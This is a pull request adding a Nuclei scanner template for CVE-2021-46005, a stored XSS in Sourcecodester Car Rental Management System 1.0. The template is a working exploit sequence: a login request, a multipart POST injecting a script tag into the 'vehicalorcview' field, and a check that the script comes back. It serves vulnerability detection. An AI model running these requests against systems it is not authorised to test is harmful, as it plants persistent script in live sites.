### PR TITLE
add CVE-2021-46005 (Sourcecodester Car Rental Management System 1.0 - Stored XSS)

### DIFF
--- a/cves/2021/CVE-2021-46005.yaml
+++ b/cves/2021/CVE-2021-46005.yaml
@@ -1,0 +1,139 @@
+id: CVE-2021-46005
+
+info:
+  name: Sourcecodester Car Rental Management System 1.0 - Stored XSS
+  author: cckuailong
+  severity: medium
+  description: Sourcecodester Car Rental Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via vehicalorcview parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/49546
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46005
+  tags: cve,cve2021,xss
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cve-id: CVE-2021-46005
+    cwe-id: CWE-79
+
+requests:
+  - raw:
+      - |
+        POST /admin/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Length: 36
+        Cache-Control: max-age=0
+        Upgrade-Insecure-Requests: 1
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Referer: {{RootURL}}
+        Accept-Encoding: gzip, deflate
+        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+        Connection: close
+
+        username={{username}}&password={{password}}&login=
+        
+      - |
+        POST /admin/post-avehical.php HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Content-Type: multipart/form-data; boundary=---------------------------13786099262839578593645594965
+        Content-Length: 2085
+        Origin: {{RootURL}}
+        Connection: close
+        Referer: {{RootURL}}/OnlineCarRental/admin/post-avehical.php
+        Upgrade-Insecure-Requests: 1
+
+        -----------------------------13786099262839578593645594965
+        Content-Disposition: form-data; name="vehicletitle"
+
+        TestName
+        -----------------------------13786099262839578593645594965
+        Content-Disposition: form-data; name="brandname"
+
+        2
+        -----------------------------13786099262839578593645594965
+        Content-Disposition: form-data; name="vehicalorcview"
+
+        <script>alert("CAR")</script>
+        -----------------------------13786099262839578593645594965
+        Content-Disposition: form-data; name="priceperday"
+
+        200
+        -----------------------------13786099262839578593645594965
+        Content-Disposition: form-data; name="fueltype"
+
+        Diesel
+        -----------------------------13786099262839578593645594965
+        Content-Disposition: form-data; name="modelyear"
+
+        2008
+        -----------------------------13786099262839578593645594965
+        Content-Disposition: form-data; name="seatingcapacity"
+
+        22
+        -----------------------------13786099262839578593645594965
+        Content-Disposition: form-data; name="img1"; filename="Untitled.png"
+        Content-Type: image/png
+
+        PNG
+        -----------------------------13786099262839578593645594965
+        Content-Disposition: form-data; name="img5"; filename=""
+        Content-Type: application/octet-stream
+
+
+        -----------------------------13786099262839578593645594965
+        Content-Disposition: form-data; name="powerdoorlocks"
+
+        1
+        -----------------------------13786099262839578593645594965
+        Content-Disposition: form-data; name="antilockbrakingsys"
+
+        1
+        -----------------------------13786099262839578593645594965
+        Content-Disposition: form-data; name="driverairbag"
+
+        1
+        -----------------------------13786099262839578593645594965
+        Content-Disposition: form-data; name="passengerairbag"
+
+        1
+        -----------------------------13786099262839578593645594965
+        Content-Disposition: form-data; name="centrallocking"
+
+        1
+        -----------------------------13786099262839578593645594965
+        Content-Disposition: form-data; name="crashcensor"
+
+        1
+        -----------------------------13786099262839578593645594965
+        Content-Disposition: form-data; name="submit"
+
+
+        -----------------------------13786099262839578593645594965--
+
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        Upgrade-Insecure-Requests: 1
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Accept-Encoding: gzip, deflate
+        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+        Connection: close
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<script>alert("CAR")</script>'
+          
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information

Sourcecodester Car Rental Management System 1.0 - Stored XSS

- References:
    https://www.exploit-db.com/exploits/49546
    https://nvd.nist.gov/vuln/detail/CVE-2021-46005

### Template Validation

I've validated this template locally?
- [1 ] YES
- [ ] NO

Vuln Target:
- https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-46005/vultarget

![image](https://user-images.githubusercontent.com/10824150/151662793-19f1394d-e6b8-44d2-a33c-9de9dde19485.png)


#### Additional Details (leave it blank if not applicable)

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)